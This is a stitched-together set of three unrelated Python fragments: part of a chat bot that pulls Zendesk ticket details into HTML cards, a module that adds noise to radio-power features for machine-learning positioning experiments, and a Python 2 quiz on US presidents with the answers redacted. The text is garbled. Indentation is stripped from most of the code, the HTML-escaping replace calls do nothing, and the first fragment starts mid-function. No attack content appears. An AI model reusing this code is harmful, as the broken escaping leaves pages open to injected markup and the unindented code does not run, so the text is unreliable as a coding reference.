requestorganization_id = str(d["ticket"]["organization_id"])
requestrequester_id = str(d["ticket"]["requester_id"])
requestcreated_at = str(d["ticket"]["created_at"]).replace("T", " ").replace("Z", "")
requestupdated_at = str(d["ticket"]["updated_at"]).replace("T", " ").replace("Z", "")
requestassignee_id = str(d["ticket"]["assignee_id"])
except:
conn.request("GET", "/api/v2/requests/" + ticketURLid + ".json", headers=headers_ticket)
res = conn.getresponse()
data = res.read()
request_raw = data.decode("utf-8")
data_dict = json.loads(str(request_raw))
data = json.dumps(data_dict, indent=2)
d = json.loads(data)
requestid = str(d["request"]["id"])
requeststatus = str(d["request"]["status"])
requestpriority = str(d["request"]["priority"])
# requestseverity = str(d["request"]["severity"])
requestsubject_temps = str(d["request"]["subject"])
requestsubject = str(requestsubject_temps).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
requestdescription_temps = str(d["request"]["description"])
requestdescription = str(requestdescription_temps).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">").replace("\n\n \n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n", "<br/><br/>").replace("\n\n \n\n", "<br/><br/>").replace("\n\n", "<br/><br/>").replace("\n", "<br/>")
requestorganization_id = str(d["request"]["organization_id"])
requestrequester_id = str(d["request"]["requester_id"])
requestcreated_at = str(d["request"]["created_at"]).replace("T", " ").replace("Z", "")
requestupdated_at = str(d["request"]["updated_at"]).replace("T", " ").replace("Z", "")
requestassignee_id = str(d["request"]["assignee_id"])
request_id = str(requestid)
request_status = str(requeststatus)
request_priority = str(requestpriority)
# request_severity = str(requestseverity)
request_severity = ("Not set")
request_subject = str(requestsubject)
request_desc = str(requestdescription)
desc = str(request_desc)
request_org = str(requestorganization_id)
request_requestor = str(requestrequester_id)
request_created = str(requestcreated_at)
request_updated = str(requestupdated_at)
# To get the name of the requester given the requesterID
headers_users = {
'email_address': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': (_configDef['zdesk_config']['zdesk_password']),
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'content-type': "application/json"
}
conn.request("GET", "/api/v2/users/" + request_requestor, headers=headers_users)
res = conn.getresponse()
userRequesterId = res.read()
tempUserRequester = str(userRequesterId.decode('utf-8'))
# data = json.dumps(tempUserRequester, indent=2)
# data_dict = ast.literal_eval(data)
data_dict = json.loads(str(tempUserRequester))
data = json.dumps(data_dict, indent=2)
d = json.loads(data)
req_name = str(d["user"]["name"])
requesterName = req_name
try:
request_assignee = str(requestassignee_id)
# To get the name of the assignee given the assigneeID
conn.request("GET", "/api/v2/users/" + request_assignee, headers=headers)
res = conn.getresponse()
userAssigneeId = res.read()
tempUserAssignee = str(userAssigneeId.decode('utf-8'))
# data = json.dumps(tempUserAssignee, indent=2)
# data_dict = ast.literal_eval(data)
data_dict = json.loads(str(tempUserAssignee))
data = json.dumps(data_dict, indent=2)
d = json.loads(str(data))
assign_name = str(d["user"]["name"])
assigneeName = assign_name
except:
assigneeName = "Not assigned"
assignee_flag = True
requesterTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/requester/requested_tickets"
assigneeTicket = (_configDef['zdesk_config']['zdesk_url']) + "/agent/users/" + request_assignee + "/assigned_tickets"
OrgTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/organization/tickets"
# Convert the Zendesk ID to company name
headers_org = {
'email_address': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': (_configDef['zdesk_config']['zdesk_password']),
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'content-type': "application/json"
}
conn.request("GET", "/api/v2/users/" + requestrequester_id + "/organizations.json", headers=headers_org)
res = conn.getresponse()
companyID = res.read()
compNameRaw = str(companyID.decode("utf-8"))
data_dict = json.loads(str(compNameRaw))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d = json.loads(data)
try:
org_Name = str(d["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
orgName = str(org_name_temp)
#print(orgName)
except:
orgName = "Company not yet created"
# table_body = ""
# table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
# "<td style='width:20%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
# "<td style='width:30%;border:1px solid blue;border-bottom: double blue;text-align:center'>DESCRIPTION</td>" \
# "<td style='width:2.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
# "<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
# "<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
# "<td style='width:3.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
# "<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
# "<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
# "</tr></thead><tbody>"
#
# if assignee_flag:
#
# table_body += "<tr>" \
# "<td style='border:1px solid black;text-align:left'>" + request_subject + "</td>" \
# "<td style='border:1px solid black;text-align:left'>" + desc + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_status + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_priority + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + OrgTicket + "\">" + orgName + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + requesterTicket + "\">" + str(requesterName) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_created + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_updated + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + assigneeName + "</td>" \
# "</tr>" \
# "</tbody></table>"
#
# else:
# table_body += "<tr>" \
# "<td style='border:1px solid black;text-align:left'>" + request_subject + "</td>" \
# "<td style='border:1px solid black;text-align:left'>" + desc + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_status + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_priority + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + OrgTicket + "\">" + orgName + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + requesterTicket + "\">" + str(requesterName) + "</a></td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_created + "</td>" \
# "<td style='border:1px solid black;text-align:center'>" + request_updated + "</td>" \
# "<td style='border:1px solid black;text-align:center'><a href=\"" + assigneeTicket + "\">" + str(assigneeName) + "</a></td>" \
# "</tr>" \
# "</tbody></table>"
#
# reply_raw = table_header + table_body
###############
if assignee_flag:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(assigneeName) + "</td>" \
"</tr></thead><tbody></tbody></table>"
else:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a></td>" \
"</tr></thead><tbody></tbody></table>"
###############
reply_raw = table_header
reply = str(reply_raw).replace("\ufffd", "")
#return messageDetail.ReplyToChatV2_noBotLog(reply)
# return messageDetail.ReplyToChatV2_noBotLog(
# "<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>Please find below the new Support Ticket</header><body>" + reply + "</body></card>")
return messageDetail.ReplyToChatV2_noBotLog(
"<card iconSrc =\"\" accent=\"tempo-bg-color--blue\"><header>Please find below the new Support Ticket</header><body>" + reply + "</body></card>")
############################
else:
return | |
""" Python module that contains functions to manipulate the datasets used to train the models
"""
import logging
import concurrent.futures
import numpy as np
from sklearn.preprocessing import Binarizer, Normalizer
def create_noisy_features(
    features,
    labels,
    experiment_settings,
    data_parameters,
):
    """
    Creates ONE noisy sample (i.e. pair of noisy features [received power] with non-noisy labels
    [position]) PER POSITION, given the target noise level. Any noisy feature instance below the
    detection threshold is discarded (i.e. set to 0).

    Note: the features here should be in range [0, ~1.2], according to the original experiments

    :param features: numpy 2D matrix, [sample_index, feature_index]
    :param labels: numpy 2D matrix, [sample_index, dimention]
    :param experiment_settings: experiment-related settings
    :param data_parameters: raw data-related settings
    :return: one full set of noisy features, with the corresponding non-noisy labels
    """
    # Computes some auxiliary variables
    scaler = _get_scaler(experiment_settings["scaler_type"])
    scaled_noise, scaled_cutoff = _convert_power_variables(
        experiment_settings,
        data_parameters
    )
    # Shortcut: no noise to be added? return original data
    if scaled_noise == 0.0:
        return features, labels
    # Adds noise
    noise = np.random.normal(scale=scaled_noise, size=features.shape)
    noisy_features = features + noise
    # Cuts features below the minimum power detection threshold
    noisy_features[noisy_features < scaled_cutoff] = 0
    # Removes the samples containing only 0s as features (vectorized row-sum
    # test, replacing the original per-row Python loop)
    mask = np.sum(noisy_features, axis=1) >= 0.01
    noisy_features = noisy_features[mask, :]
    noisy_labels = labels[mask, :]
    # Sanity check
    assert noisy_features.shape[0] == noisy_labels.shape[0]
    assert noisy_labels.shape[1] == 2
    assert noisy_features.shape[1] == features.shape[1]
    # Applies the scaler, if wanted
    if scaler is not None:
        noisy_features = scaler.fit_transform(noisy_features)
    # If the model is a cnn, reshapes the input to [sample, BF, TS, channel]
    if experiment_settings["model_type"] == "cnn":
        beamformings = data_parameters["beamformings"]
        time_slots = int(features.shape[1] / beamformings)
        noisy_features = np.reshape(
            noisy_features, (noisy_features.shape[0], beamformings, time_slots, 1)
        )
    return noisy_features, noisy_labels
def _convert_power_variables(experiment_settings, data_parameters):
""" `create_noisy_features` auxiliary function. Scales some power-related settings by
as much as the features were scaled.
:param experiment_settings: [description]
:param data_parameters: [description]
:return: noise and power cut off variables, as used in `create_noisy_features`
"""
# Unpacks variables
power_offset = data_parameters["power_offset"]
power_scale = data_parameters["power_scale"]
original_tx_power = data_parameters["original_tx_power"]
original_rx_gain = data_parameters["original_rx_gain"]
baseline_cut = experiment_settings["detection_threshold"]
tx_power = experiment_settings["tx_power"]
rx_gain = experiment_settings["rx_gain"]
# Computes and scales the detection theshold
adjusted_cutoff = baseline_cut - (tx_power - original_tx_power) - (rx_gain - original_rx_gain)
scaled_cutoff = (adjusted_cutoff + power_offset) * power_scale
# Scales the noise
scaled_noise = experiment_settings["noise_std"] * power_scale
return scaled_noise, scaled_cutoff
def _get_scaler(scaler_type):
    """Returns a scaler to apply to the features.

    :param scaler_type: "binarizer", "normalizer", or None for no scaling
    :return: the initialized scaler, or None when no scaling is requested
    :raises ValueError: if `scaler_type` is none of the accepted values
    """
    scaler = None
    if scaler_type == "binarizer":
        # `threshold` is keyword-only in current scikit-learn releases, so
        # passing 0.1 positionally would raise a TypeError there
        scaler = Binarizer(threshold=0.1, copy=False)
    elif scaler_type == "normalizer":
        scaler = Normalizer(copy=False)
    elif scaler_type is not None:
        raise ValueError("Invalid scaler type ({})! Accepted values: 'binarizer', 'normalizer'"\
            .format(scaler_type))
    return scaler
def undersample_bf(features, beamformings):
    """ Halves the number of beamformings used in the features (expected use: 32 -> 16 BF)

    Columns are laid out beamforming-major (column index // time_slots gives the
    beamforming index); every even-indexed beamforming block is dropped.

    :param features: numpy 2D matrix, [sample_index, feature_index]
    :param beamformings: Number of beamformings used to create the BFF
    :returns: Updated features
    """
    time_slots = int(features.shape[1] / beamformings)
    # Vectorized replacement for the original per-column Python loop
    column_bf = np.arange(time_slots * beamformings) // time_slots
    mask = (column_bf % 2) == 1
    features = features[:, mask]
    logging.warning("Attention: features undersampled to 16 BFs. Features shape: %s",
                    features.shape)
    return features
def undersample_space(features, labels, distance):
    """ Widens the space between samples.

    :param features: numpy 2D matrix, [sample_index, feature_index]
    :param labels: numpy 2D matrix, [sample_index, dimention]
    :param distance: minimum distance between samples (in meters, min=1m)
    :returns: Updated features and labels
    """
    distance = int(distance)  # just in case
    assert distance >= 1, "The minimum distance between samples has to be an integer "\
        "equal or greater than 1"
    # Scaling the normalized labels by 400 recovers the grid coordinates
    # (presumably meters — matches the ":param distance:" unit above). Keep only
    # samples whose x AND y coordinates fall on the coarser grid.
    # Vectorized replacement for the original per-sample Python loop;
    # astype(int) truncates toward zero exactly like the original int() calls.
    scaled = (labels * 400).astype(int)
    mask = (scaled[:, 0] % distance == 0) & (scaled[:, 1] % distance == 0)
    features = features[mask, :]
    labels = labels[mask, :]
    logging.warning("Attention: the minimum distance between samples is now %s meters. "
                    "Features shape: %s", distance, features.shape)
    return features, labels
def position_to_class(labels, lateral_partition):
    """ Used with hierarchical CNN experiments.

    Converts a list of 2D positions into a list of classes, given a lateral partition. Of course,
    this assumes the 2D area is a square, and each resulting class will be a sub-square with
    side = lateral_partition. In other words, if lateral_partition = N, the original area will be
    split in N^2 classes

    :param labels: numpy 2D matrix, [sample_index, dimention]
    :param lateral_partition: number of lateral partitions
    :returns: numpy 1D array with one class index per sample
    """
    # Vectorized replacement for the original per-sample Python loop
    x_indexes = np.floor(labels[:, 0] * lateral_partition).astype(int)
    y_indexes = np.floor(labels[:, 1] * lateral_partition).astype(int)
    # Positions exactly on the far edge (coordinate == 1.0) belong to the last cell
    x_indexes[x_indexes == lateral_partition] = lateral_partition - 1
    y_indexes[y_indexes == lateral_partition] = lateral_partition - 1
    return (y_indexes * lateral_partition) + x_indexes
def get_95th_percentile(y_true, y_pred, rescale_factor=1.):
    """ Gets the 95th percentile for the distance

    :param y_true: ground truth
    :param y_pred: model predictions
    :param rescale_factor: multiplier applied to the resulting percentile
    :returns: 95th percentile of the per-sample Euclidean distances
    """
    n_predictions = y_pred.shape[0]
    # Euclidean distance between each prediction and its ground-truth position
    distances = np.linalg.norm(y_true[:n_predictions, :] - y_pred, axis=1)
    return np.percentile(distances, 95) * rescale_factor
# -------------------------------------------------------------------------------------------------
# Path-handling functions
def _static_paths_sampler(
    mask,
    paths,
    features,
    labels,
    time_steps,
    experiment_settings,
    data_parameters
):
    """ Helper function to `sample_paths` - samples static paths

    Note - static paths format = {(x, y): index in the dataset}
    """
    wanted_positions = np.asarray(list(paths.values()))[mask]

    def _build_sequence(dataset_index):
        # A static path simply repeats the same position `time_steps` times
        sequence = _apply_noise_and_scaler(
            np.asarray([features[dataset_index, :]] * time_steps),
            experiment_settings,
            data_parameters
        )
        if sequence is None:
            # Broken sequence (some sample fell entirely below the cutoff)
            return None, None
        return sequence, labels[dataset_index, :]

    X, y = [], []
    with concurrent.futures.ThreadPoolExecutor() as executor:
        for sequence, label in executor.map(_build_sequence, wanted_positions):
            if label is not None:
                X.append(sequence)
                y.append(label)
    return np.asarray(X), np.asarray(y)
def _moving_paths_sampler(
    mask,
    paths,
    features,
    labels,
    time_steps,
    experiment_settings,
    data_parameters
):
    """ Helper function to `sample_paths` - samples moving paths

    Note - moving paths format = [[dataset index for pos_1, dataset index for pos_2, ...], [...]]
    """
    wanted_sequences = np.asarray(paths)[mask, :]

    def _build_sequence(index_sequence):
        raw_sequence = [features[dataset_index, :] for dataset_index in index_sequence]
        assert len(raw_sequence) == time_steps, "The length of the obtained sequence ({}) does "\
            "not match the expected length ({})".format(len(raw_sequence), time_steps)
        sequence = _apply_noise_and_scaler(
            np.asarray(raw_sequence),
            experiment_settings,
            data_parameters
        )
        if sequence is None:
            # Broken sequence (some sample fell entirely below the cutoff)
            return None, None
        # The label of a moving path is the path's final position
        return sequence, labels[index_sequence[-1], :]

    X, y = [], []
    with concurrent.futures.ThreadPoolExecutor() as executor:
        for sequence, label in executor.map(_build_sequence, wanted_sequences):
            if label is not None:
                X.append(sequence)
                y.append(label)
    return np.asarray(X), np.asarray(y)
def _apply_noise_and_scaler(
    sequence,
    experiment_settings,
    data_parameters
):
    """ Helper function to `sample_paths` - applies the noise and the scaler over a sequence
    of features

    Returns None for broken sequences (any sample left with no detectable power).
    """
    scaled_noise, scaled_cutoff = _convert_power_variables(
        experiment_settings,
        data_parameters
    )
    # Adds noise, then zeroes everything below the detection threshold
    noisy_sequence = sequence + np.random.normal(scale=scaled_noise, size=sequence.shape)
    noisy_sequence[noisy_sequence < scaled_cutoff] = 0
    # A sample containing only 0s breaks the sequence -> discard the whole thing.
    # Samples with meaningful power count as 1; if the total falls short of the
    # sequence length, at least one sample was empty.
    per_sample_sums = np.sum(noisy_sequence, axis=1)
    per_sample_sums[per_sample_sums > 0.001] = 1
    if np.sum(per_sample_sums) < len(sequence):
        return None
    # Applies the scaler, if any
    scaler = _get_scaler(experiment_settings["scaler_type"])
    if scaler is not None:
        noisy_sequence = scaler.fit_transform(noisy_sequence)
        if experiment_settings["scaler_type"] == "binarizer":
            noisy_sequence = noisy_sequence.astype(bool)
    return noisy_sequence
def sample_paths(
paths,
features,
labels,
experiment_settings,
data_parameters,
path_parameters,
sample_fraction=1.
):
"""
Given the input arguments (see description below), returns:
1 - X, the noisy sequence input data (sequences with the predefined length)
2 - y, the labels (one label per sequence)
3 - a dict with the ending index for that path type (used at test time)
Having RAM problems? Use the "sample_fraction" option in `path_parameters` and train for
more "epochs" (in this case, epochs is not the most adequate word :D) The function will use
~sample_fraction times the original dataset per "epoch", were 0 <= sample_fraction < 1
:param paths: paths created in the preprocessing step. The paths will be used with `features`
to create the actual dataset
:param features: numpy 2D matrix, [sample_index, feature_index]
:param labels: numpy 2D matrix, [sample_index, dimention]
:param experiment_settings: experiment-related settings
:param data_parameters: raw data-related settings
:param path_parameters: path-related settings
:param sample_fraction: floating point between 0 and 1, indicating | |
# Imports (NOTE: this is a Python 2 script — it relies on raw_input and
# print statements further down)
import os
# Clear the terminal so the quiz starts on a clean screen
os.system('clear')
# Pause until the player is ready, then clear again
raw_input("type anything to start: ")
os.system('clear')
# Default scores, one per player (shown later by the leaderboard option)
R_points = 18
A_points = 30
O_points = 0
J_points = 5
V_points = 14
# Each entry pairs [current score, display name]
alist = [A_points, "Alexander"]
olist = [O_points, "Olivia"]
vlist = [V_points, "Vince"]
rlist = [R_points, "Rebecca"]
jlist = [J_points, "Jonathan"]
while True:
#Special Effects
print "President Quiz 4.4.1(2017 Standard Edition)"
print "By <NAME>"
print "Sponsored by BusinessRate"
print " $$$$$$$$$"
print " $$o$o$$$$"
print " $$$L$$$$$"
print " $$___$$$$"
print " $$$$$$$$$"
print " $$ $$"
print " $$ $$"
print " $$ $$"
print " $$$$$$$$$$$$$$$$$$$$"
print " $$ $$"
print " $$ $$"
print " $$ $$"
print " $$"
print " $$$$ $$$$$"
print " $$ $$ $$"
print " $$ $$ $$"
print " $$ $$$$$$$$$$"
print " $$"
print " $$"
print " $$"
print "$$$$$"
#Lets the user read status or take the test
menu = raw_input("What do you want to do? (Take the test, Study, Repitition or Read the leaderboard)")
#If the user would like to test themself
if menu == "Take the test":
name = raw_input("Please enter your name: ")
#Tests the individuals separately so they can have there own scores
if name == "Olivia":
while True:
ifUserStart = raw_input("Are you ready? ")
if ifUserStart == "yes":
break
if ifUserStart == "Yes":
break
points = 0
QA = raw_input("Who is the 45th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 44th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 43rd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 42nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 41st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 40th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 39th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 38th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 37th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 36th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
print "<NAME>"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 35th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 34th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 33th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 32nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 31st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 30th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 29th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
# ---------------------------------------------------------------------------
# Presidents quiz (Python 2: `print` statements, `raw_input`).
# NOTE(review): the indentation of this section appears to have been
# stripped/mangled in transit; the code is kept byte-for-byte and only
# comments were added.  Each question follows the same 7-line pattern:
# prompt, award one point on an exact (case-sensitive) match, otherwise
# reveal the answer.  Answers are redacted to "<NAME>" in this copy.
# `points`, `O_points` and `name` are presumably defined earlier in the
# script -- TODO confirm.
# ---------------------------------------------------------------------------
QA = raw_input("Who is the 28th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 27th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 26th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 25th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 24th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
# NOTE(review): "23th" should read "23rd" -- user-visible typo, left as-is
# because prompt strings are runtime behavior.
QA = raw_input("Who is the 23th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 22nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 21st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 20th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 19th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 18th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 17th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 16th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 15th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 14th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 13th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 12th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 11th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 10th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
